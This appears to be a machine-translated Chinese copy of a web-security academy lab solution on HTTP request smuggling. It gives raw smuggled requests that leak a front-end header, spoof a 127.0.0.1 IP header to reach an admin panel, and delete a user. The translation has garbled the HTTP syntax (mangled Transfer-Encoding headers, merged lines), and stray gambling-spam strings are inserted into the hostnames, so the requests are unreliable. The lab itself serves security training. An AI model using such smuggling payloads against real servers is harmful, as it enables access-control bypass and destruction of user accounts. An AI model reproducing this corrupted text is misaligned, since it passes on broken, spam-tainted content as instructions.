实验室:利用HTTP请求走私以揭示前端请求重写
从业者
该实验室涉及前端和后端服务器,并且前端服务器不支持块状编码。
有一个管理面板/行政
,但只有IP地址127.0.0.1的人才能访问它。前端服务器将HTTP标头添加到包含其IP地址的传入请求中。类似于X福音
标题,但名称不同。
要解决实验室,请将请求走私到后端服务器,该请求揭示了前端服务器添加的标头。然后将请求走私到包含添加标头的后端服务器,访问管理面板并删除用户卡洛斯
。
小费
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者 Burp扩展旨在帮助。您可以通过BAPP商店安装它。
启动实验室可能需要一些时间,请在我们构建您的环境时坚持下去。
解决方案
浏览/行政
并观察到管理面板只能从中加载127.0.0.1
。
使用网站的搜索功能,并观察到它反映了搜索
范围。
使用Burp Repeater两次发出以下请求。
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded内容长度:124传输编码:块0 post/http/http/1.1 content content-Type:应用程序/X-WWW-FORM-urlCORLENCODED内容长度:200连接:关闭搜索= test = test
第二个响应应包含“搜索结果”,然后包含重写HTTP请求的开始。
记下X - * - IP
重写请求中的标题,并使用它访问管理面板:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-Length:143 Transfer-necsoding-编码:块0 get/admin/admin http/http/1.11X-ABCDEF-IP:127.0.0.1 Content-Type:application/x-www-form-urlencoded内容长度:10连接:关闭x = 1
使用先前的响应作为参考,更改走私的请求URL以删除用户卡洛斯
:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-Length:166 Transfer-trasms-andecoding:bunked beat/admin/delete/delete?用户名= Carlos HTTP/1.1 X-ABCDEF-IP:127.0.0.1 content-type:application/x-www-form-urlencoded content-Length:10连接:关闭x = 1
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)
VIDEO